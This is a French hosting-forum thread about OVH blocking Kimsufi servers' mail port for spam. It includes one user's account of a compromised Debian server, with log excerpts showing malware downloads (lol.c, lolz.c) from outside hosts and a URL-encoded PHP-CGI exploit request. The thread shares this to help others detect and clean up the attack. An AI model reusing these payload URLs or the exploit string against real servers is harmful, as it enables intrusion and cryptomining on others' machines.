OVH Community, your new community space.

[URGENT]Détection de spams sur l'IP XXX.XXX.XXX.XXX


nowwhat
04/02/2014, 12h35
Pose tes questions. C'est pour ça que ce forum existe.
Et t'inquiète, le super-roks-admins ne sont pas là (starouille passe ton chemin.... va boire un café avec cassiope ) car on possède des KS ....

Si la réponse n'est pas clair ou incompréhensible, c'est probablement car la question est mal compris ...
Dite-le à ce moment là.
En attente d'un OUI-NON-MOYEN-PAS COMPRIS-AUTRE restons: .. :
http://forum.kimsufi.com/showthread....203#post129203
http://forum.kimsufi.com/showthread....381#post130381
http://forum.kimsufi.com/showthread....541#post130541

lapassoire
04/02/2014, 12h03
Citation Envoyé par nowwhat
Revient quand même dès que t'as des réponses, il en manque cruellement ici - je suis bien d'accord avec toi
Je n'ai selon toi et surtout selon moi pas les compétences nécessaires pour apporter des réponses concrètes aux problèmes pos(t)és ici, il faudrait d'abord que je sache résoudre ceux de ma propre machine.

nowwhat
04/02/2014, 11h35
Citation Envoyé par lapassoire
Désolé mais tu commences à me fatiguer toi.
Et le sujet de fashiontec va te faire quoi ?

Citation Envoyé par lapassoire
T'as que ça à faire de tes journées de polluer ce forum avec des posts de leçon de morale pour les newbies (tout le monde n'est pas LE super admin expérimenté, il faut bien débuter un jour) sans jamais faire de vraies réponses efficaces à leurs questions ?
Détrompe-toi.
Je fait comme vous, j'ai loué un serveur KS "jou-jou apprentie admin", et je joue avec.
Rien de très super - et rien d'insurmontable. On passe seulement son temps à consulter Google et des doc's/faq's/notices/etc.

Va relire la question (questions) de fashiontec encore une fois.
Ta réponse: les scripts PHP et leur failles peuvent indiquer comment tout ça lui est arrivé, or fashiontec n'a pas dit qu'il s'agit d'un serveur web (avec des scripts PHP ou autres). fashiontec demande de savoir comment éviter la blocage de sa porte 25.
Avec d'autres mots: nous ne savons pas que le serveur de fashiontec est une passoire.
(oops).

Citation Envoyé par lapassoire
Pour ma part je quitte ce forum, j'irai chercher des réponses ailleurs.
Revient quand même dès que t'as des réponses, il en manque cruellement ici - je suis bien d'accord avec toi

lapassoire
04/02/2014, 11h05
@nowwhat :

Désolé mais tu commences à me fatiguer toi.

T'as que ça à faire de tes journées de polluer ce forum avec des posts de leçon de morale pour les newbies (tout le monde n'est pas LE super admin expérimenté, il faut bien débuter un jour) sans jamais faire de vraies réponses efficaces à leurs questions ?

Pour ma part je quitte ce forum, j'irai chercher des réponses ailleurs.

nowwhat
04/02/2014, 10h55
@lapassoire:
fashiontec loue des serveurs depuis des années. Il me semble que depuis, il a du envoyer déjà pas mal des mails depuis.
Il parle de SPF, DKIM, (opt-in-opt-out), le reverse des ces DNS etc, le baba ce qui concerne le transport des mails.
Je le considère comme postfix-admin avertie.
=> (Quoi que: se faire bloquer son serveur pour spam, sachant qu'il se auto-déclaré "spam level 1" m'indique que son spamassassin est un peu trop permissive.)
=> (Quoi que: il n'est pas au courant ce qui ce passe chez OVH, les développements plus que majeur ......)

Ce faire hacker un serveur pour qu'un tiers s’amuse avec, ça n'est que un sport rendu possible à grande échèle très récemment.
Les règles de la protection d'un serveur n'ont pas changé depuis des décennies. Ceux qui louent un serveur pour l'exploiter, eux, oui ....

lapassoire
04/02/2014, 10h37
Bonjour fashiontec,

J'ai eu le même problème la semaine dernière, du coup j'ai cherché l'origine et je suis en train de reprendre la sécurité de mon serveur depuis zéro (pour ma part je ne maîtrise pas trop le sujet mais j'apprends sur le tas, je teste, je me renseigne ici sur le forum, c'est chronophage mais faut en passer par là).

Dans mon cas - machine sous Debian Squeeze - , après avoir cherché un moment, j'ai trouvé comment ces attaques se produisaient : des scripts sont installés dans le répertoive /dev/shm, qui correspond à la mémoire (RAM) et où normalement rien ne doit se trouver, ces scripts passent également dans les répertoires /tmp et /var/tmp.

Pour bloquer l'attaque en urgence, commence donc par regarder siu tu as des choses anormales dans ces 3 répertoires et si oui vire les, après avoir noté les noms pour pouvoir faire une recherche dans tes logs. Si tu trouves quelque chose dans /dev/shm (moi j'avais un répertoire nommé avec 3 lettres, disons 'abc' et un autre se nommant miner.d) redémarre la machine, comme c'est la mémoire ça tuera le processus. Puis vide la queue mail.

Tu peux sécuriser le répertoire /dev/shm en suivant ce tuto, http://www.leeroy.me/ques-ce-que-dev...st-il-utilise/, et tmp + var/tmp en suivant celui-là : http://kb.iweb.com/entries/23960922-...exec?locale=16

Teste ensuite que les scripts y sont bien désactivés en tentant d'exécuter n'importe quel shell perso. Pour ma part ça a l'air de focntionner, tous les jours je retrouve encore des fichiers dans /dev/shm, /tmp et var/tmp mais il ne s'éxécutent plus.

Ensuite recherche les noms des fichiers trouvés (si tu en as) dans les logs. J'ai trouvé des requêtes du genre :

Code:
[Wed Jan 29 09:22:23 2014] [error] [client 91.121.91.50] --2014-01-29 09:22:23--  http://94.23.42.103/lolz.c
[Wed Jan 29 19:03:28 2014] [error] [client 91.121.91.50] --2014-01-29 19:03:28--  http://94.23.42.103/lolz.c
[Wed Jan 29 19:13:28 2014] [error] [client 91.121.91.50] --2014-01-29 19:13:28--  http://94.23.42.103/lolz.c
[Wed Jan 29 22:44:45 2014] [error] [client 85.9.250.228] --2014-01-29 22:44:45--  http://94.23.42.103/lolz.c
[Wed Jan 29 22:54:46 2014] [error] [client 85.9.250.228] --2014-01-29 22:54:46--  http://94.23.42.103/lolz.c
[Fri Jan 31 17:22:53 2014] [error] [client 77.107.237.42] --2014-01-31 17:22:53--  http://94.23.42.103/lol.c
[Fri Jan 31 17:32:53 2014] [error] [client 77.107.237.42] --2014-01-31 17:32:53--  http://94.23.42.103/lol.c
[Fri Jan 31 23:03:44 2014] [error] [client 193.111.199.182] --2014-01-31 23:03:44--  http://daone.altervista.org/lol.c
[Fri Jan 31 23:13:45 2014] [error] [client 193.111.199.182] --2014-01-31 23:13:45--  http://daone.altervista.org/lol.c
Attention : les 'lol.c' et compagnie sont signalés comme virus (merci BitDefender), ne pas ouvrir ces url si vous n'avez pas un antivirus sur votre PC.

Repère l'une de ces IP et cherche-là dans les logs, tu devrais trouver quelque chose du genre :

Code:
77.107.237.42 - - [27/Jan/2014:17:45:16 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 504 1908 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
Voir ici : https://security.stackexchange.com/q...in-php-attacks

Pour ma part j'ai configuré le virtual host mais ça n'a pas l'air suffisant vu que je continue à trouver régulièrement des fichiers dans /dev/shm ou /tmp. Faudrait que j'upgrade (pas encore eu le temps et ça risque de dépasser un peu mes compétences) mais je ne sais pas si ça sera encore suffisant d'après ce qui est dit dans l'article.

En espérant que ça aide les lecteurs de ce forum. Et si vous avez des pistes pour bloquer définitevement ces attaques, je suis preneur bien sûr !

nowwhat
04/02/2014, 09h06
Bonjour,

Tout d'abord, le sujet n'est pas nouveau. Ce forum - et lui de forum.ovh.com témoigne de beaucoup de clients qui ont trouvé leur serveur bloqués pour émission des mails. Le sujet a toujours existé - depuis le début d'OVH Oles nous a beaucoup communiqué sur ce sujet - depuis 6 mois, les canaux Twitter, mail liste en même la presse l'ont bien suivi. Ils (OVH) ont activé un système de "7 zéros" en place pour protéger le réseau OVH comme distributeur spam planétaire.
Il y avait urgence: les IP's d'OVH, tout source IP confondue, a éé bloque quotidiennement chez les FAI nationales mais aussi les très gros comme gmail, hotmail, et autres.
Avec plus de xxx million des spams par jour -

La mise en place d’un système qui implique http://guide.ovh.net/AntiSpamBestPratice n'est pas nouveau. le "nom" d'OVH en tant que réseau a été en jeu. OVH en avez marre d'être dans les top 10 planétaire comme 'origine' des spams.
Une comparaison ridicule car OVH est aussi dans la liste "plus gros nombre des serveurs" - numéro 3 en ce moment.

Ce qui est chiant:
L’utilisation d'un KS est totalement remis placé dans cette optique:
"Passez de la théorie à la pratique avec un serveur qui vous accompagnera tout au long de votre cursus universitaire et au-delà. Découvrez le métier de sysadmin et enrichissez vos compétences. " et "Administrez votre serveur avec notre gamme de distributions brutes, testez et déployez des environnements et des outils de développement, découvrez de nouvelles technologies. " et "Hébergez votre site web, votre site communautaire ou vos applications sur votre propre plateforme. Pilotez vos sites avec une administration simplifiée grâce aux panneaux de gestion. "
On note l'absence totale la distribution "en nombre" des mails ou toute autre forme d’exploitation commerciale d’un KS. Ceci n'implique pas que ce n'est pas possible et on constate aussi que les vieux KS (loué quand ces nouveaux "contraintes" n’existe pas encore) sont aussi ajusté à nouvelles règles de jeu. Nous avons signé récemment les nouveaux contrats pour ça (sinon, impossible relouer)
Il est fort dommage que peu ou rien est connu sur la fonctionnement de http://www.vade-retro.com/fr/ - difficile donc de dire "traite vos mails ainsi et ils ne seront plus considérés comme spam". Ce qui rassure est le fait de constater que des gros boites utilise les services de http://www.vade-retro.com/fr/ - dont certains FAI - il manque que Orange dans cette liste.

C'est aussi dommage de constater que nous n'avons toujours pas une liste sur ce forum, ou ailleurs, qui nous montre quelle type de mail fait avancer le compteur "spam" chez OVH. Nous savons que 100+ spams par jour activent le blocage.

Conclusion: l'envoi en nombre des mails sur un KS est devenue mission impossible car le support "cas-par-cas" n'y plus non plus.
La procédure "comment s'en sortir" est vague.

PS: OVH te bloque mais t'as pas filé une liste avec des mails qui t'on fait bloquer ??
Dommage .... personne ne veut nous montrer ces mails.

fashiontec
04/02/2014, 06h20
Bonsoir à tous,

J'ai eu ce matin la désagréable surprise de constater que mes X serveurs Kimsufi ont eu leur port 25 bloqué pour cause de spam.
Je suis assez étonné car notre sytème d'envoi de mails fonctionne sans soucis majeur depuis plusieurs années.

J'ai donc des kimsufi sur lesquels sont installées un postfix + spam Assassin + signature DKIM.
Les reverses DNS sont bien configuré sur chacun de ces serveurs.
Nous traitons les bounces.
Un enregistrement SPF contenant nos x serveurs est bien configuré sur notre dns.

Dans l'email d'ovh m'indiquant le blocage un certain nombre d'emails considérés comme spam m'ont été listés.
J'ai été vérifier sur mon serveur et ces emails ne sont pas des spam.
Mes serveurs n'ont bien entendu pas été piratés.
Le score spam assassin des emails envoyés était de 1 !

Alors je suppose que mes emails sont des faux positifs mais OVH ne veut absolument pas traité mes appels ouvertures de ticket car cela concerne des kimsufi(j'ajoute qu'on louent un certain nombre de serveurs dediés non kimsufi).

Pouvez-vous m'aider ?
Y a-t-il quelque chose que nous avons manqué ?
Savez vous comment tester les emails pour savoir comment éviter que mes emails bloquent le serveur avant envoi (api vade retro ?) ?
Vous faut-il plus d'infos ?

Bien-sur avant de poster ce message j'ai été lire les posts parlant de ce sujet (ex : http://forum.ovh.com/showthread.php?...QUOI-JOUE-OVH-!)
J'ai aussi été sur http://guide.ovh.net/AntiSpamBestPratice et nous respectons bien tous les critères.

Merci d'avance !